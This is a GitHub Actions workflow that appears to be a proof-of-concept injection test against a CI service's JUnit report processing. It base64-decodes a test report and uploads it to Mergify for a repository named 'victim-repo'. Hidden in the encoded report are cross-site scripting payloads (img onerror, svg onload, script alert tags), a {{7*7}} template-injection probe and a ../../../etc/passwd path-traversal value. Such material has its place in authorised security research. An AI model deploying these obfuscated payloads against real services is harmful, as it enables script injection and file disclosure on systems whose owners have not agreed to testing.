name: ci-inject
on: push
permissions:
  id-token: write
  contents: read
jobs:
  inject:
    runs-on: ubuntu-latest
    env:
      MERGIFY_TOKEN: ${{ github.token }}
    steps:
      - run: echo PHRlc3RzdWl0ZXM+PHRlc3RzdWl0ZSBuYW1lPSJwbF8mbHQ7aW1nIHNyYz14IG9uZXJyb3I9YWxlcnQoMSkmZ3Q7IiB0ZXN0cz0iMSIgZmFpbHVyZXM9IjEiPjx0ZXN0Y2FzZSBuYW1lPSJ0XyZsdDtzdmcvb25sb2FkPWFsZXJ0KGRvY3VtZW50LmRvbWFpbikmZ3Q7IiBjbGFzc25hbWU9ImMiIGZpbGU9Ii4uLy4uLy4uL2V0Yy9wYXNzd2QiPjxmYWlsdXJlIG1lc3NhZ2U9Ik1TRyAmbHQ7c2NyaXB0Jmd0O2FsZXJ0KDIpJmx0Oy9zY3JpcHQmZ3Q7IHt7Nyo3fX0iIHR5cGU9IkUiPlNUQUNLICZsdDtzdmcgb25sb2FkPWFsZXJ0KDMpJmd0OzwvZmFpbHVyZT48L3Rlc3RjYXNlPjwvdGVzdHN1aXRlPjwvdGVzdHN1aXRlcz4= | base64 -d > j.xml
      - run: pip install mergify-cli
      - run: mergify ci junit-process --repository mgfidorlabri/victim-repo --tests-target-branch main j.xml || true
